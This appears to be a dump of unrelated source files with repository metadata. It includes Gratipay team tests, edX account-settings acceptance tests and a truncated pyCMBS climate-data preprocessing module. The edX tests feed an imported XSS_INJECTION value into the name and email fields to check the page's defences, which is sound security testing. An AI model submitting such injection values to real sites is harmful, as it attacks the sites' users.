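# e.g.: aEdgeGrid, aEdgeActor = make_cell_actor(aEdge, edgePoints, edgeScalars)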
|
HopeFOAM/HopeFOAM
|
ThirdParty-0.1/ParaView-5.0.1/VTK/Common/DataModel/Testing/Python/LineIntersectQuadraticCells.py
|
Python
|
gpl-3.0
| 17,068
|
[
"VTK"
] |
d9b02cc114e64829cce4d3d35665a5bc5423f125947799750a265edbdaf50241
|
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.testing import BrowserHarness, D,P
from selenium.webdriver.common.keys import Keys
class Tests(BrowserHarness):
def setUp(self):
BrowserHarness.setUp(self)
self.enterprise = self.make_team(available=500)
self.alice = self.make_participant( 'alice'
, claimed_time='now'
, email_address='alice@example.com'
, verified_in='TT'
)
def test_owner_can_add_a_member(self):
self.sign_in('picard')
self.visit('/TheEnterprise/distributing/')
self.css('.lookup-container .query').first.fill('alice')
self.css('.lookup-container button').first.click()
self.wait_for('table.team a')
assert [a.text for a in self.css('table.team a')] == ['alice']
def set_take(self, amount):
el = self.css('table.team form.edit input').first
el.fill(amount)
el.type(Keys.ENTER)
def test_member_can_set_their_take(self):
self.enterprise.add_member(self.alice, P('picard'))
self.sign_in('alice')
self.visit('/TheEnterprise/distributing/')
self.set_take('5.37')
assert self.wait_for_success() == 'Your take is now $5.37.'
assert self.enterprise.get_take_for(self.alice) == D('5.37')
def test_member_can_set_their_take_again(self):
self.test_member_can_set_their_take()
self.set_take('100')
assert self.wait_for_success() == 'Your take is now $100.00.'
assert self.enterprise.get_take_for(self.alice) == D('100.00')
def test_owner_can_remove_a_member(self):
self.enterprise.add_member(self.alice, P('picard'))
self.sign_in('picard')
self.visit('/TheEnterprise/distributing/')
self.css('table.team span.remove').first.click()
self.wait_for('.confirmation-modal .yes').first.click()
assert self.wait_for_success() == 'alice has been removed from the team.'
assert self.enterprise.get_memberships() == []
def test_members_are_sorted_by_amount_ascending(self):
bob = self.make_participant( 'bob'
, claimed_time='now'
, email_address='bob@example.com'
, verified_in='TT'
)
self.enterprise.add_member(self.alice, P('picard'))
self.enterprise.add_member(bob, P('picard'))
self.enterprise.set_take_for(self.alice, D('5.00'), self.alice)
self.enterprise.set_take_for(bob, D('37.00'), bob)
self.visit('/TheEnterprise/distributing/')
assert [a.text for a in self.css('table.team a')] == ['alice', 'bob']
self.enterprise.set_take_for(bob, D('4.00'), bob)
self.visit('/TheEnterprise/distributing/')
assert [a.text for a in self.css('table.team a')] == ['bob', 'alice']
def test_totals_are_as_expected(self):
bob = self.make_participant( 'bob'
, claimed_time='now'
, email_address='bob@example.com'
, verified_in='TT'
)
self.enterprise.add_member(self.alice, P('picard'))
self.enterprise.add_member(bob, P('picard'))
self.enterprise.set_take_for(self.alice, D('5.00'), self.alice)
self.enterprise.set_take_for(bob, D('37.00'), bob)
self.visit('/TheEnterprise/distributing/')
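        # with 500 available: the takes sum to 42.00, the undistributed
        # balance is 500 - 42 = 458.00, and 458 / 500 * 100 = 91.6 percent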
assert self.css('tr.totals .take').first.text == '42.00'
assert self.css('tr.totals .balance').first.text == '458.00'
assert self.css('tr.totals .percentage').first.text == '91.6'
|
gratipay/gratipay.com
|
tests/ttw/test_team_distributing.py
|
Python
|
mit
| 3,894
|
[
"VisIt"
] |
4ef7bbb4ec49da71f3ae586011f2b135161c14c0cfccd9c35cfb0153d3a7a3e8
|
# -*- coding: utf-8 -*-
"""
End-to-end tests for the Account Settings page.
"""
from unittest import skip
from nose.plugins.attrib import attr
from bok_choy.web_app_test import WebAppTest
from bok_choy.page_object import XSS_INJECTION
from ...pages.lms.account_settings import AccountSettingsPage
from ...pages.lms.auto_auth import AutoAuthPage
from ...pages.lms.dashboard import DashboardPage
from ..helpers import EventsTestMixin
class AccountSettingsTestMixin(EventsTestMixin, WebAppTest):
"""
Mixin with helper methods to test the account settings page.
"""
CHANGE_INITIATED_EVENT_NAME = u"edx.user.settings.change_initiated"
USER_SETTINGS_CHANGED_EVENT_NAME = 'edx.user.settings.changed'
ACCOUNT_SETTINGS_REFERER = u"/account/settings"
def visit_account_settings_page(self):
"""
Visit the account settings page for the current user, and store the page instance
as self.account_settings_page.
"""
# pylint: disable=attribute-defined-outside-init
self.account_settings_page = AccountSettingsPage(self.browser)
self.account_settings_page.visit()
self.account_settings_page.wait_for_ajax()
def log_in_as_unique_user(self, email=None, full_name=None):
"""
Create a unique user and return the account's username and id.
"""
username = "test_{uuid}".format(uuid=self.unique_id[0:6])
auto_auth_page = AutoAuthPage(self.browser, username=username, email=email, full_name=full_name).visit()
user_id = auto_auth_page.get_user_id()
return username, user_id
def settings_changed_event_filter(self, event):
"""Filter out any events that are not "settings changed" events."""
return event['event_type'] == self.USER_SETTINGS_CHANGED_EVENT_NAME
def expected_settings_changed_event(self, setting, old, new, table=None):
"""A dictionary representing the expected fields in a "settings changed" event."""
return {
'username': self.username,
'referer': self.get_settings_page_url(),
'event': {
'user_id': self.user_id,
'setting': setting,
'old': old,
'new': new,
'truncated': [],
'table': table or 'auth_userprofile'
}
}
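    # A hedged example of the dict above: changing 'name' from 'Alice' to 'Bob'
    # (hypothetical values) should yield
    #   {'username': ..., 'referer': ..., 'event': {'user_id': ..., 'setting': 'name',
    #    'old': 'Alice', 'new': 'Bob', 'truncated': [], 'table': 'auth_userprofile'}}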
def settings_change_initiated_event_filter(self, event):
"""Filter out any events that are not "settings change initiated" events."""
return event['event_type'] == self.CHANGE_INITIATED_EVENT_NAME
def expected_settings_change_initiated_event(self, setting, old, new, username=None, user_id=None):
"""A dictionary representing the expected fields in a "settings change initiated" event."""
return {
'username': username or self.username,
'referer': self.get_settings_page_url(),
'event': {
'user_id': user_id or self.user_id,
'setting': setting,
'old': old,
'new': new,
}
}
def get_settings_page_url(self):
"""The absolute URL of the account settings page given the test context."""
return self.relative_path_to_absolute_uri(self.ACCOUNT_SETTINGS_REFERER)
def assert_no_setting_changed_event(self):
"""Assert no setting changed event has been emitted thus far."""
self.assert_no_matching_events_were_emitted({'event_type': self.USER_SETTINGS_CHANGED_EVENT_NAME})
@attr('shard_8')
class DashboardMenuTest(AccountSettingsTestMixin, WebAppTest):
"""
Tests that the dashboard menu works correctly with the account settings page.
"""
def test_link_on_dashboard_works(self):
"""
Scenario: Verify that the "Account" link works from the dashboard.
Given that I am a registered user
And I visit my dashboard
And I click on "Account" in the top drop down
Then I should see my account settings page
"""
self.log_in_as_unique_user()
dashboard_page = DashboardPage(self.browser)
dashboard_page.visit()
dashboard_page.click_username_dropdown()
self.assertIn('Account', dashboard_page.username_dropdown_link_text)
dashboard_page.click_account_settings_link()
@attr('shard_8')
class AccountSettingsPageTest(AccountSettingsTestMixin, WebAppTest):
"""
Tests that verify behaviour of the Account Settings page.
"""
SUCCESS_MESSAGE = 'Your changes have been saved.'
def setUp(self):
"""
Initialize account and pages.
"""
super(AccountSettingsPageTest, self).setUp()
self.full_name = XSS_INJECTION
self.username, self.user_id = self.log_in_as_unique_user(full_name=self.full_name)
self.visit_account_settings_page()
def test_page_view_event(self):
"""
Scenario: An event should be recorded when the "Account Settings"
page is viewed.
Given that I am a registered user
And I visit my account settings page
Then a page view analytics event should be recorded
"""
actual_events = self.wait_for_events(
event_filter={'event_type': 'edx.user.settings.viewed'}, number_of_matches=1)
self.assert_events_match(
[
{
'event': {
'user_id': self.user_id,
'page': 'account',
'visibility': None
}
}
],
actual_events
)
def test_all_sections_and_fields_are_present(self):
"""
Scenario: Verify that all sections and fields are present on the page.
"""
expected_sections_structure = [
{
'title': 'Basic Account Information (required)',
'fields': [
'Username',
'Full Name',
'Email Address',
'Password',
'Language',
'Country or Region'
]
},
{
'title': 'Additional Information (optional)',
'fields': [
'Education Completed',
'Gender',
'Year of Birth',
'Preferred Language',
]
},
{
'title': 'Connected Accounts',
'fields': [
'Dummy',
'Facebook',
'Google',
]
}
]
self.assertEqual(self.account_settings_page.sections_structure(), expected_sections_structure)
def _test_readonly_field(self, field_id, title, value):
"""
Test behavior of a readonly field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.value_for_readonly_field(field_id), value)
def _test_text_field(
self, field_id, title, initial_value, new_invalid_value, new_valid_values, success_message=SUCCESS_MESSAGE,
assert_after_reload=True
):
"""
Test behaviour of a text field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.value_for_text_field(field_id), initial_value)
self.assertEqual(
self.account_settings_page.value_for_text_field(field_id, new_invalid_value), new_invalid_value
)
self.account_settings_page.wait_for_indicator(field_id, 'validation-error')
self.browser.refresh()
self.assertNotEqual(self.account_settings_page.value_for_text_field(field_id), new_invalid_value)
for new_value in new_valid_values:
self.assertEqual(self.account_settings_page.value_for_text_field(field_id, new_value), new_value)
self.account_settings_page.wait_for_message(field_id, success_message)
if assert_after_reload:
self.browser.refresh()
self.assertEqual(self.account_settings_page.value_for_text_field(field_id), new_value)
def _test_dropdown_field(
self, field_id, title, initial_value, new_values, success_message=SUCCESS_MESSAGE, reloads_on_save=False
):
"""
Test behaviour of a dropdown field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.value_for_dropdown_field(field_id), initial_value)
for new_value in new_values:
self.assertEqual(self.account_settings_page.value_for_dropdown_field(field_id, new_value), new_value)
self.account_settings_page.wait_for_message(field_id, success_message)
if reloads_on_save:
self.account_settings_page.wait_for_loading_indicator()
else:
self.browser.refresh()
self.account_settings_page.wait_for_page()
self.assertEqual(self.account_settings_page.value_for_dropdown_field(field_id), new_value)
def _test_link_field(self, field_id, title, link_title, success_message):
"""
        Test behaviour of a link field.
"""
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.link_title_for_link_field(field_id), link_title)
self.account_settings_page.click_on_link_in_link_field(field_id)
self.account_settings_page.wait_for_message(field_id, success_message)
def test_username_field(self):
"""
Test behaviour of "Username" field.
"""
self._test_readonly_field('username', 'Username', self.username)
def test_full_name_field(self):
"""
Test behaviour of "Full Name" field.
"""
self._test_text_field(
u'name',
u'Full Name',
self.full_name,
u'@',
[u'another name', self.full_name],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event('name', self.full_name, 'another name'),
self.expected_settings_changed_event('name', 'another name', self.full_name),
],
actual_events
)
def test_email_field(self):
"""
Test behaviour of "Email" field.
"""
email = u"test@example.com"
username, user_id = self.log_in_as_unique_user(email=email)
self.visit_account_settings_page()
self._test_text_field(
u'email',
u'Email Address',
email,
u'test@example.com' + XSS_INJECTION,
[u'me@here.com', u'you@there.com'],
success_message='Click the link in the message to update your email address.',
assert_after_reload=False
)
actual_events = self.wait_for_events(
event_filter=self.settings_change_initiated_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_change_initiated_event(
'email', email, 'me@here.com', username=username, user_id=user_id),
# NOTE the first email change was never confirmed, so old has not changed.
self.expected_settings_change_initiated_event(
'email', email, 'you@there.com', username=username, user_id=user_id),
],
actual_events
)
# Email is not saved until user confirms, so no events should have been
# emitted.
self.assert_no_setting_changed_event()
def test_password_field(self):
"""
Test behaviour of "Password" field.
"""
self._test_link_field(
u'password',
u'Password',
u'Reset Password',
success_message='Click the link in the message to reset your password.',
)
event_filter = self.expected_settings_change_initiated_event('password', None, None)
self.wait_for_events(event_filter=event_filter, number_of_matches=1)
# Like email, since the user has not confirmed their password change,
# the field has not yet changed, so no events will have been emitted.
self.assert_no_setting_changed_event()
@skip(
'On bokchoy test servers, language changes take a few reloads to fully realize '
'which means we can no longer reliably match the strings in the html in other tests.'
)
def test_language_field(self):
"""
Test behaviour of "Language" field.
"""
self._test_dropdown_field(
u'pref-lang',
u'Language',
u'English',
[u'Dummy Language (Esperanto)', u'English'],
reloads_on_save=True,
)
def test_education_completed_field(self):
"""
Test behaviour of "Education Completed" field.
"""
self._test_dropdown_field(
u'level_of_education',
u'Education Completed',
u'',
[u'Bachelor\'s degree', u''],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event('level_of_education', None, 'b'),
self.expected_settings_changed_event('level_of_education', 'b', None),
],
actual_events
)
def test_gender_field(self):
"""
Test behaviour of "Gender" field.
"""
self._test_dropdown_field(
u'gender',
u'Gender',
u'',
[u'Female', u''],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event('gender', None, 'f'),
self.expected_settings_changed_event('gender', 'f', None),
],
actual_events
)
def test_year_of_birth_field(self):
"""
Test behaviour of "Year of Birth" field.
"""
# Note that when we clear the year_of_birth here we're firing an event.
self.assertEqual(self.account_settings_page.value_for_dropdown_field('year_of_birth', ''), '')
expected_events = [
self.expected_settings_changed_event('year_of_birth', None, 1980),
self.expected_settings_changed_event('year_of_birth', 1980, None),
]
with self.assert_events_match_during(self.settings_changed_event_filter, expected_events):
self._test_dropdown_field(
u'year_of_birth',
u'Year of Birth',
u'',
[u'1980', u''],
)
def test_country_field(self):
"""
Test behaviour of "Country or Region" field.
"""
self._test_dropdown_field(
u'country',
u'Country or Region',
u'',
[u'Pakistan', u'Palau'],
)
def test_preferred_language_field(self):
"""
Test behaviour of "Preferred Language" field.
"""
self._test_dropdown_field(
u'language_proficiencies',
u'Preferred Language',
u'',
[u'Pushto', u''],
)
actual_events = self.wait_for_events(event_filter=self.settings_changed_event_filter, number_of_matches=2)
self.assert_events_match(
[
self.expected_settings_changed_event(
'language_proficiencies', [], [{'code': 'ps'}], table='student_languageproficiency'),
self.expected_settings_changed_event(
'language_proficiencies', [{'code': 'ps'}], [], table='student_languageproficiency'),
],
actual_events
)
def test_connected_accounts(self):
"""
Test that fields for third party auth providers exist.
Currently there is no way to test the whole authentication process
because that would require accounts with the providers.
"""
providers = (
['auth-oa2-facebook', 'Facebook', 'Link'],
['auth-oa2-google-oauth2', 'Google', 'Link'],
)
for field_id, title, link_title in providers:
self.assertEqual(self.account_settings_page.title_for_field(field_id), title)
self.assertEqual(self.account_settings_page.link_title_for_link_field(field_id), link_title)
@attr('a11y')
class AccountSettingsA11yTest(AccountSettingsTestMixin, WebAppTest):
"""
Class to test account settings accessibility.
"""
def test_account_settings_a11y(self):
"""
Test the accessibility of the account settings page.
"""
self.log_in_as_unique_user()
self.visit_account_settings_page()
self.account_settings_page.a11y_audit.config.set_rules({
'ignore': [
'link-href', # TODO: AC-233
],
})
self.account_settings_page.a11y_audit.check_for_accessibility_errors()
|
devs1991/test_edx_docmode
|
common/test/acceptance/tests/lms/test_account_settings.py
|
Python
|
agpl-3.0
| 17,612
|
[
"VisIt"
] |
b5ae131d765b0a391f06f6b025a20ac0a5aefbb1d6c032680b0b7087e49d9cbd
|
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import ast
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
from pycmbs.utils import print_log, WARNING
class CMIP5Data(Model):
"""
Class for CMIP5 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir : str
directory that specifies the root directory where the data is located
model : TBD todo
experiment : str
specifies the ID of the experiment
dic_variables : TODO
name : str
name of model
shift_lon : bool
specifies if longitudes of data need to be shifted
kwargs : dict
other keyword arguments
"""
if name == '':
name = model
super(CMIP5Data, self).__init__(data_dir, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
Returns
-------
string with unique combination of models and experiment
"""
s = self.model.replace(' ', '') + '-' + self.experiment.replace(' ', '')
s = s.replace('#', '-')
if hasattr(self, 'ens_member'):
s += '-' + str(self.ens_member)
return s
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_wind(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_evaporation(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_latent_heat_flux(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_model_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
        if self.type not in kwargs.keys():
            print ''
            print 'WARNING: it is not possible to get data using the generic function, as settings for this model type are missing: ', self.type, kwargs.keys()
            assert False
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
        # no defaults; everything should be explicitly specified in either the config file or the dictionaries
varname = locdict.pop('variable', None)
#~ print self.type
#~ print locdict.keys()
assert varname is not None, 'ERROR: provide varname!'
units = locdict.pop('unit', None)
assert units is not None, 'ERROR: provide unit!'
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
model_suffix = locdict.pop('model_suffix', None)
model_prefix = locdict.pop('model_prefix', None)
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if custom_path is None:
filename1 = self.get_raw_filename(varname, **kwargs) # routine needs to be implemented by each subclass
else:
filename1 = custom_path + self.get_raw_filename(varname, **kwargs)
if filename1 is None:
print_log(WARNING, 'No valid model input data')
return None
force_calc = False
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
        #1) select time period and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
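        # e.g. <tmpdir>/tas_Amon_X_2001-01-01_2010-12-31_T63_monmean.nc (hypothetical name)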
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
            thetime_cycle = 12
        elif interval == 'season':
            thetime_cycle = 4
        else:
            print interval
            raise ValueError('Unsupported interval!')
        mdata = Data(mdata_clim_file, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cycle)
        mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cycle)
mdata.std = mdata_std.data.copy()
del mdata_std
        mdata_N = Data(mdata_N_file, varname, read=True, label=self._unique_name + ' N', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
mdata_all.adjust_time(day=15)
        # mask_antarctica masks everything below 60 degrees S;
        # here we only mask Antarctica if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
mdata._raw_filename = filename1
mdata._monthly_filename = file_monthly
mdata._clim_filename = mdata_clim_file
mdata._varname = varname
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
def get_temperature_2m(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_albedo(self, interval='season', dic_up=None, dic_down=None):
"""
        calculate albedo as the ratio of upward and downwelling fluxes.
        First, the monthly mean fluxes are used to calculate the albedo.
        As the usage of different variables requires knowledge of the configuration of
        the input streams, these need to be provided in addition.
Parameters
----------
dic_up : dict
dictionary for get_surface_shortwave_radiation_up() as specified in model_data_routines.json
dic_down : dict
dictionary for get_surface_shortwave_radiation_down() as specified in model_data_routines.json
"""
assert dic_up is not None, 'ERROR: dic_up needed'
assert dic_down is not None, 'ERROR: dic_down needed'
force_calc = False
# read land-sea mask
#~ ls_mask = get_T63_landseamask(self.shift_lon)
#~ target grid ??? valid mask ????
def _extract_dict_from_routine_name(k, s):
# extract dictionary name from routine name in model_data_routines.json
res = ast.literal_eval(s[k].split('**')[1].rstrip()[:-1])
#~ print res, type(res)
return res
        # extract configuration dictionaries for fluxes from model_data_routines
kw_up = _extract_dict_from_routine_name('surface_upward_flux', dic_up)
kw_down = _extract_dict_from_routine_name('sis', dic_down)
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
# get fluxes
Fu = self.get_surface_shortwave_radiation_up(interval=interval, **kw_up)
if Fu is None:
print 'File not existing for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
lab = Fu_i._get_label()
Fd = self.get_surface_shortwave_radiation_down(interval=interval, **kw_down)
if Fd is None:
print 'File not existing for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
        # albedo for the chosen interval is calculated as the ratio of mean fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
#~ Fu_i._apply_mask(ls_mask.data)
        # albedo for monthly data (needed for global mean plots)
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
#~ Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
class CMIP5RAWData(CMIP5Data):
"""
This class is supposed to use CMIP5 data in RAW format.
This means that it builds on the CMORIZED CMIP5 data, but
    performs all necessary preprocessing steps, e.g. the calculation
    of ensemble means.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAW'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, varname, **kwargs):
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
return self._get_ensemble_filename(varname, mip, realm)
def _get_ensemble_filename(self, the_variable, mip, realm):
"""
get filename of ensemble mean file
if required, then all pre-processing steps are done
Parameters
----------
the_variable : str
variable name to be processed
Returns
-------
returns filename of file with multi-ensemble means
"""
# use model parser to generate a list of available institutes and
# models from data directory
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
CMP = preprocessor.CMIP5ModelParser(self.data_dir)
model_list = CMP.get_all_models()
# model name in configuration file is assumed to be INSTITUTE:MODEL
institute = self.model.split(':')[0]
model = self.model.split(':')[1]
# TODO why is the institute not in the model output name ???
output_file = get_temporary_directory() + the_variable + '_' + mip + '_' + model + '_' + self.experiment + '_ensmean.nc'
if institute not in model_list.keys():
raise ValueError('Data for this institute is not existing: %s' % institute)
        # do preprocessing of data from multiple ensembles; if the file
        # already exists, then no processing is done
C5PP = preprocessor.CMIP5Preprocessor(data_dir, output_file,
the_variable, model,
self.experiment,
institute=institute, mip=mip, realm=realm)
# calculate the ensemble mean and store as file
        # the STDV is also calculated on the fly
# resulting filenames are available by C5PP.outfile_ensmean and C5PP.outfile_ensstd
C5PP.ensemble_mean(delete=False,
start_time=self.start_time,
stop_time=self.stop_time)
return C5PP.outfile_ensmean
class CMIP5RAW_SINGLE(CMIP5RAWData):
"""
This class is supposed to use CMIP5 data in RAW format.
    It is supposed to handle single ensemble members
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
model_type : str
            model type as specified in the configuration file. It is
            supposed to be of the format MPI-M:MPI-ESM-LR#1 etc.,
            where after # there needs to be an integer number specifying
            the ensemble member number
"""
if name == '':
name = model
# split between model type and ensemble member
s = model.split('#')
if len(s) != 2:
print model, s
raise ValueError('ERROR: invalid ensemble member specification')
else:
model = s[0]
self.ens_member = int(s[1])
self.institute = model.split(':')[0]
super(CMIP5RAWData, self).__init__(data_dir, model, experiment, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5RAWSINGLE'
self._unique_name = self._get_unique_name()
def get_raw_filename(self, variable, **kwargs):
"""
return RAW filename for class CMIP5RAWSINGLE
"""
# information comes from model_data_routines.json
mip = kwargs[self.type].pop('mip', None)
assert mip is not None, 'ERROR: <mip> needs to be provided (CMIP5RAWSINGLE)'
realm = kwargs[self.type].pop('realm')
assert realm is not None, 'ERROR: <realm> needs to be provided (CMIP5RAWSINGLE)'
temporal_resolution = kwargs[self.type].pop('temporal_resolution')
assert temporal_resolution is not None, 'ERROR: <temporal_resolution> needs to be provided (CMIP5RAWSINGLE)'
data_dir = self.data_dir
if data_dir[-1] != os.sep:
data_dir += os.sep
model = self.model.split(':')[1]
fp = data_dir + self.institute + os.sep + model + os.sep + self.experiment + os.sep + temporal_resolution + os.sep + realm + os.sep + mip + os.sep + 'r' + str(self.ens_member) + 'i1p1' + os.sep + variable + os.sep + variable + '_' + mip + '_' + model + '_' + self.experiment + '_r' + str(self.ens_member) + 'i1p1_*.nc'
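        # resulting glob pattern, with hypothetical mip/realm/resolution values:
        # <data_dir>/MPI-M/MPI-ESM-LR/historical/mon/atmos/Amon/r1i1p1/tas/tas_Amon_MPI-ESM-LR_historical_r1i1p1_*.nc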
files = glob.glob(fp)
if len(files) == 0:
return None
if len(files) != 1:
print files
raise ValueError('More than one file found!')
return files[0]
class CMIP3Data(CMIP5Data):
"""
Class for CMIP3 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir: directory that specifies the root directory where the data is located
        model: TBD todo
experiment: specifies the ID of the experiment (str)
dic_variables:
